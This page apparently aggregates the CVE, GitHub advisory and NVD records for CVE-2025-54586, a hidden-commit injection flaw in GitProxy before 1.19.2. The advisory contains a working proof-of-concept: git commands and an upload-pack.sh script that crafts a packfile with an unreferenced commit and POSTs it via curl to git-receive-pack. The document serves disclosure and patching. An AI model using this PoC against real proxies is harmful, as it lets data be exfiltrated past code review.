CVE-2025-54586 (GCVE-0-2025-54586)
Vulnerability from cvelistv5 – Published: 2025-07-30 21:14 – Updated: 2025-07-31 17:55
VLAI?
Title
GitProxy is susceptible to a hidden commits injection attack
Summary
GitProxy is an application that stands between developers and a Git remote endpoint. In versions 1.19.1 and below, attackers can inject extra commits into the pack sent to GitHub, commits that aren’t pointed to by any branch. Although these “hidden” commits never show up in the repository’s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High‑impact vulnerability because it completely compromises repository confidentiality. This is fixed in version 1.19.2.
Severity ?
7.1 (High)
CWE
- CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-54586",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-31T13:40:01.971988Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-31T17:55:46.333Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "git-proxy",
"vendor": "finos",
"versions": [
{
"status": "affected",
"version": "\u003c 1.19.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "GitProxy is an application that stands between developers and a Git remote endpoint. In versions 1.19.1 and below, attackers can inject extra commits into the pack sent to GitHub, commits that aren\u2019t pointed to by any branch. Although these \u201chidden\u201d commits never show up in the repository\u2019s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High\u2011impact vulnerability because it completely compromises repository confidentiality. This is fixed in version 1.19.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-30T21:14:41.238Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g"
},
{
"name": "https://github.com/finos/git-proxy/commit/9c1449f4ec37d2d1f3edf4328bc3757e8dba2110",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/finos/git-proxy/commit/9c1449f4ec37d2d1f3edf4328bc3757e8dba2110"
},
{
"name": "https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a"
},
{
"name": "https://github.com/finos/git-proxy/releases/tag/v1.19.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/finos/git-proxy/releases/tag/v1.19.2"
}
],
"source": {
"advisory": "GHSA-v98g-8rqx-g93g",
"discovery": "UNKNOWN"
},
"title": "GitProxy is susceptible to a hidden commits injection attack"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-54586",
"datePublished": "2025-07-30T21:14:41.238Z",
"dateReserved": "2025-07-25T16:19:16.094Z",
"dateUpdated": "2025-07-31T17:55:46.333Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-54586\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-07-30T22:15:25.120\",\"lastModified\":\"2025-08-01T20:03:03.700\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"GitProxy is an application that stands between developers and a Git remote endpoint. In versions 1.19.1 and below, attackers can inject extra commits into the pack sent to GitHub, commits that aren\u2019t pointed to by any branch. Although these \u201chidden\u201d commits never show up in the repository\u2019s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High\u2011impact vulnerability because it completely compromises repository confidentiality. This is fixed in version 1.19.2.\"},{\"lang\":\"es\",\"value\":\"GitProxy es una aplicaci\u00f3n que se interpone entre los desarrolladores y un endpoint remoto de Git. En las versiones 1.19.1 y anteriores, los atacantes pueden inyectar commits adicionales en el paquete enviado a GitHub, commits que no est\u00e1n dirigidos por ninguna rama. Aunque estos commits \\\"ocultos\\\" nunca aparecen en el historial visible del repositorio, GitHub los muestra en sus URL de commit directo. Esto permite a un atacante extraer datos confidenciales sin dejar rastro en la vista de la rama. Esta vulnerabilidad se considera de alto impacto porque compromete completamente la confidencialidad del repositorio. Se ha corregido en la versi\u00f3n 1.19.2.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":4.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:finos:gitproxy:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.19.2\",\"matchCriteriaId\":\"5066AC65-E6FA-4582-AE66-0CBBED07F809\"}]}]}],\"references\":[{\"url\":\"https://github.com/finos/git-proxy/commit/9c1449f4ec37d2d1f3edf4328bc3757e8dba2110\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/finos/git-proxy/releases/tag/v1.19.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\",\"Release Notes\"]},{\"url\":\"https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-54586\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-07-31T13:40:01.971988Z\"}}}], \"references\": [{\"url\": \"https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-07-31T13:40:03.304Z\"}}], \"cna\": {\"title\": \"GitProxy is susceptible to a hidden commits injection attack\", \"source\": {\"advisory\": \"GHSA-v98g-8rqx-g93g\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"finos\", \"product\": \"git-proxy\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.19.2\"}]}], \"references\": [{\"url\": \"https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g\", \"name\": \"https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/finos/git-proxy/commit/9c1449f4ec37d2d1f3edf4328bc3757e8dba2110\", \"name\": \"https://github.com/finos/git-proxy/commit/9c1449f4ec37d2d1f3edf4328bc3757e8dba2110\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a\", \"name\": \"https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/finos/git-proxy/releases/tag/v1.19.2\", \"name\": \"https://github.com/finos/git-proxy/releases/tag/v1.19.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"GitProxy is an application that stands between developers and a Git remote endpoint. In versions 1.19.1 and below, attackers can inject extra commits into the pack sent to GitHub, commits that aren\\u2019t pointed to by any branch. Although these \\u201chidden\\u201d commits never show up in the repository\\u2019s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High\\u2011impact vulnerability because it completely compromises repository confidentiality. This is fixed in version 1.19.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-07-30T21:14:41.238Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-54586\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-07-31T17:55:46.333Z\", \"dateReserved\": \"2025-07-25T16:19:16.094Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-07-30T21:14:41.238Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
GHSA-V98G-8RQX-G93G
Vulnerability from github – Published: 2025-07-30 16:40 – Updated: 2025-07-31 12:02
VLAI?
Summary
GitProxy Hidden Commits Injection
Details
Summary
An attacker can inject extra commits into the pack sent to GitHub, commits that aren’t pointed to by any branch. Although these “hidden” commits never show up in the repository’s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High‑impact vulnerability because it completely compromises repository confidentiality.
Details
The proxy currently trusts only the ref‑update line (oldOid → newOid) and doesn't inspect the packfile’s contents
Because the code only runs git rev-list oldOid..newOid to compute introducedCommits but never checks which commits actually arrived in the pack, a malicious client can append extra commits. Those “hidden” commits won’t be pointed to by any branch but GitHub still stores and serves them by SHA.
PoC
Prerequisites
- A GitHub Personal Access Token stored in
~/.github-test-pat. - A test repository also registered in git-proxy, e.g.
your-org/test-repo.git, to which you have push rights.
1. Prepare the “visible” and “hidden” commits
# Clone the test repository
git clone http://localhost:8000/your-org/test-repo.git
cd test-repo
# 1. Record the original HEAD
ORIG_COMMIT=$(git rev-parse HEAD)
# 2. Create branch 'foo' and add a visible commit
git checkout -b foo
echo "visible commit" >> file.txt
git add file.txt
git commit -m "Visible commit"
VISIBLE_COMMIT=$(git rev-parse HEAD)
# 3. Go back to the original commit and create a hidden-branch
git checkout $ORIG_COMMIT
git checkout -b hidden-branch
echo "hidden change" > hidden.txt
git add hidden.txt
git commit -m "Hidden commit"
HIDDEN_COMMIT=$(git rev-parse HEAD)
# Return to 'foo'
git checkout foo
2. Push only the visible commit to branch foo
git push --set-upstream origin foo
# An authorized user approves this push via your normal review workflow
3. Build and push a pack containing the hidden commit
Create a script named upload-pack.sh (replace the placeholder variables with the SHAs you recorded above):
#!/usr/bin/env bash
REMOTE_URL="http://localhost:8000/your-org/test-repo.git"
REF_NAME="refs/heads/foo"
ORIG_COMMIT="<<ORIG_COMMIT>>"
NEW_COMMIT="<<VISIBLE_COMMIT>>"
OLD_COMMIT="0000000000000000000000000000000000000000"
HIDDEN_COMMIT="<<HIDDEN_COMMIT>>"
# 1. List all objects for the visible and hidden commits
git rev-list --objects --no-object-names "^${ORIG_COMMIT}" ${NEW_COMMIT} > objects.txt
git rev-list --objects --no-object-names "^${ORIG_COMMIT}" ${HIDDEN_COMMIT} >> objects.txt
# 2. Pack them into a single packfile
cat objects.txt
git pack-objects --stdout < objects.txt > packfile
# 3. Construct the Git smart‑protocol update header
printf "${OLD_COMMIT} ${NEW_COMMIT} ${REF_NAME}\0 report-status-v2 side-band-64k object-format=sha1 agent=git/2.39.5" > update_line
UPDATE_LINE_LEN="$(wc -c < update_line)"
printf "%04x" $((UPDATE_LINE_LEN + 4)) > output
cat update_line >> output
# Git smart protocol expects a flush packet
PKT_FLUSH="0000"
printf "%s" "${PKT_FLUSH}" >> output
# Append the packfile
cat packfile >> output
# 4. Send the malicious push via curl
curl -u ${USER}:"$(<~/.github-test-pat)" \
-X POST "${REMOTE_URL}/git-receive-pack" \
-H "Content-Type: application/x-git-receive-pack-request" \
-H "Accept: application/x-git-receive-pack-result" \
--user-agent "git/2.42.0" \
--data-binary @output | cat -v
Make it executable:
chmod +x upload-pack.sh
Run it:
./upload-pack.sh
4. Verify the hidden commit
Open in your browser (or via curl):
https://github.com/your-org/test-repo/commit/<<HIDDEN_COMMIT>>
You will see the “Hidden commit”, even though it is not referenced by any branch.
Impact
-
Data Exfiltration (Confidentiality breach):
Attackers can inject secrets, credentials, or proprietary data into any repository they push to via git-proxy. -
Undetectable in UI:
Since the hidden commits never appear in branch graphs, standard code review will not surface them. -
Persistence Window:
GitHub retains unreferenced objects for a period long enough to allow automated retrieval before garbage‑collecting them.
Severity ?
7.1 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.19.1"
},
"package": {
"ecosystem": "npm",
"name": "@finos/git-proxy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.19.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-54586"
],
"database_specific": {
"cwe_ids": [
"CWE-200"
],
"github_reviewed": true,
"github_reviewed_at": "2025-07-30T16:40:40Z",
"nvd_published_at": "2025-07-30T22:15:25Z",
"severity": "HIGH"
},
"details": "### Summary\nAn attacker can inject extra commits into the pack sent to GitHub, commits that aren\u2019t pointed to by any branch. Although these \u201chidden\u201d commits never show up in the repository\u2019s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High\u2011impact vulnerability because it completely compromises repository confidentiality.\n\n### Details\n\nThe proxy currently trusts only the ref\u2011update line (`oldOid \u2192 newOid`) and doesn\u0027t inspect the packfile\u2019s contents\n\nBecause the code only runs `git rev-list oldOid..newOid` to compute **introducedCommits** but **never** checks which commits actually arrived in the pack, a malicious client can append extra commits. Those \u201chidden\u201d commits won\u2019t be pointed to by any branch but GitHub still stores and serves them by SHA. \n\u003cimg width=\"2556\" height=\"744\" alt=\"Screenshot 2025-07-16 at 12 29 19\" src=\"https://github.com/user-attachments/assets/abf459a9-310b-4819-a989-797c7e871790\" /\u003e\n\n### PoC\n\n#### Prerequisites\n\n- A GitHub Personal Access Token stored in `~/.github-test-pat`.\n- A test repository also registered in git-proxy, e.g. `your-org/test-repo.git`, to which you have push rights.\n\n#### 1. Prepare the \u201cvisible\u201d and \u201chidden\u201d commits\n\n```bash\n# Clone the test repository\ngit clone http://localhost:8000/your-org/test-repo.git\ncd test-repo\n\n# 1. Record the original HEAD\nORIG_COMMIT=$(git rev-parse HEAD)\n\n# 2. Create branch \u0027foo\u0027 and add a visible commit\ngit checkout -b foo\necho \"visible commit\" \u003e\u003e file.txt\ngit add file.txt\ngit commit -m \"Visible commit\"\nVISIBLE_COMMIT=$(git rev-parse HEAD)\n\n# 3. Go back to the original commit and create a hidden-branch\ngit checkout $ORIG_COMMIT\ngit checkout -b hidden-branch\necho \"hidden change\" \u003e hidden.txt\ngit add hidden.txt\ngit commit -m \"Hidden commit\"\nHIDDEN_COMMIT=$(git rev-parse HEAD)\n\n# Return to \u0027foo\u0027\ngit checkout foo\n```\n\n#### 2. Push only the visible commit to branch `foo`\n\n```bash\ngit push --set-upstream origin foo\n# An authorized user approves this push via your normal review workflow\n```\n\n#### 3. Build and push a pack containing the hidden commit\n\nCreate a script named `upload-pack.sh` (replace the placeholder variables with the SHAs you recorded above):\n\n```bash\n#!/usr/bin/env bash\nREMOTE_URL=\"http://localhost:8000/your-org/test-repo.git\"\nREF_NAME=\"refs/heads/foo\"\nORIG_COMMIT=\"\u003c\u003cORIG_COMMIT\u003e\u003e\"\nNEW_COMMIT=\"\u003c\u003cVISIBLE_COMMIT\u003e\u003e\"\nOLD_COMMIT=\"0000000000000000000000000000000000000000\"\nHIDDEN_COMMIT=\"\u003c\u003cHIDDEN_COMMIT\u003e\u003e\"\n\n# 1. List all objects for the visible and hidden commits\ngit rev-list --objects --no-object-names \"^${ORIG_COMMIT}\" ${NEW_COMMIT} \u003e objects.txt\ngit rev-list --objects --no-object-names \"^${ORIG_COMMIT}\" ${HIDDEN_COMMIT} \u003e\u003e objects.txt\n\n# 2. Pack them into a single packfile\ncat objects.txt\ngit pack-objects --stdout \u003c objects.txt \u003e packfile\n\n# 3. Construct the Git smart\u2011protocol update header\nprintf \"${OLD_COMMIT} ${NEW_COMMIT} ${REF_NAME}\\0 report-status-v2 side-band-64k object-format=sha1 agent=git/2.39.5\" \u003e update_line\nUPDATE_LINE_LEN=\"$(wc -c \u003c update_line)\"\n\nprintf \"%04x\" $((UPDATE_LINE_LEN + 4)) \u003e output\ncat update_line \u003e\u003e output\n\n# Git smart protocol expects a flush packet\nPKT_FLUSH=\"0000\"\nprintf \"%s\" \"${PKT_FLUSH}\" \u003e\u003e output\n\n# Append the packfile\ncat packfile \u003e\u003e output\n\n# 4. Send the malicious push via curl\ncurl -u ${USER}:\"$(\u003c~/.github-test-pat)\" \\\n -X POST \"${REMOTE_URL}/git-receive-pack\" \\\n -H \"Content-Type: application/x-git-receive-pack-request\" \\\n -H \"Accept: application/x-git-receive-pack-result\" \\\n --user-agent \"git/2.42.0\" \\\n --data-binary @output | cat -v\n```\n\nMake it executable:\n\n```bash\nchmod +x upload-pack.sh\n```\n\nRun it:\n\n```bash\n./upload-pack.sh\n```\n\n#### 4. Verify the hidden commit\n\nOpen in your browser (or via `curl`):\n\n```\nhttps://github.com/your-org/test-repo/commit/\u003c\u003cHIDDEN_COMMIT\u003e\u003e\n```\n\nYou will see the **\u201cHidden commit\u201d**, even though it is not referenced by any branch.\n\n### Impact\n- **Data Exfiltration (Confidentiality breach):** \n Attackers can inject secrets, credentials, or proprietary data into any repository they push to via git-proxy.\n\n- **Undetectable in UI:** \n Since the hidden commits never appear in branch graphs, standard code review will not surface them.\n\n- **Persistence Window:** \n GitHub retains unreferenced objects for a period long enough to allow automated retrieval before garbage\u2011collecting them.",
"id": "GHSA-v98g-8rqx-g93g",
"modified": "2025-07-31T12:02:22Z",
"published": "2025-07-30T16:40:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54586"
},
{
"type": "WEB",
"url": "https://github.com/finos/git-proxy/commit/9c1449f4ec37d2d1f3edf4328bc3757e8dba2110"
},
{
"type": "WEB",
"url": "https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a"
},
{
"type": "PACKAGE",
"url": "https://github.com/finos/git-proxy"
},
{
"type": "WEB",
"url": "https://github.com/finos/git-proxy/releases/tag/v1.19.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "GitProxy Hidden Commits Injection"
}
FKIE_CVE-2025-54586
Vulnerability from fkie_nvd - Published: 2025-07-30 22:15 - Updated: 2025-08-01 20:03
Severity ?
7.1 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Summary
GitProxy is an application that stands between developers and a Git remote endpoint. In versions 1.19.1 and below, attackers can inject extra commits into the pack sent to GitHub, commits that aren’t pointed to by any branch. Although these “hidden” commits never show up in the repository’s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High‑impact vulnerability because it completely compromises repository confidentiality. This is fixed in version 1.19.2.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:finos:gitproxy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5066AC65-E6FA-4582-AE66-0CBBED07F809",
"versionEndExcluding": "1.19.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "GitProxy is an application that stands between developers and a Git remote endpoint. In versions 1.19.1 and below, attackers can inject extra commits into the pack sent to GitHub, commits that aren\u2019t pointed to by any branch. Although these \u201chidden\u201d commits never show up in the repository\u2019s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High\u2011impact vulnerability because it completely compromises repository confidentiality. This is fixed in version 1.19.2."
},
{
"lang": "es",
"value": "GitProxy es una aplicaci\u00f3n que se interpone entre los desarrolladores y un endpoint remoto de Git. En las versiones 1.19.1 y anteriores, los atacantes pueden inyectar commits adicionales en el paquete enviado a GitHub, commits que no est\u00e1n dirigidos por ninguna rama. Aunque estos commits \"ocultos\" nunca aparecen en el historial visible del repositorio, GitHub los muestra en sus URL de commit directo. Esto permite a un atacante extraer datos confidenciales sin dejar rastro en la vista de la rama. Esta vulnerabilidad se considera de alto impacto porque compromete completamente la confidencialidad del repositorio. Se ha corregido en la versi\u00f3n 1.19.2."
}
],
"id": "CVE-2025-54586",
"lastModified": "2025-08-01T20:03:03.700",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-07-30T22:15:25.120",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/finos/git-proxy/commit/9c1449f4ec37d2d1f3edf4328bc3757e8dba2110"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/finos/git-proxy/commit/a620a2f33c39c78e01783a274580bf822af3cc3a"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Release Notes"
],
"url": "https://github.com/finos/git-proxy/releases/tag/v1.19.2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/finos/git-proxy/security/advisories/GHSA-v98g-8rqx-g93g"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…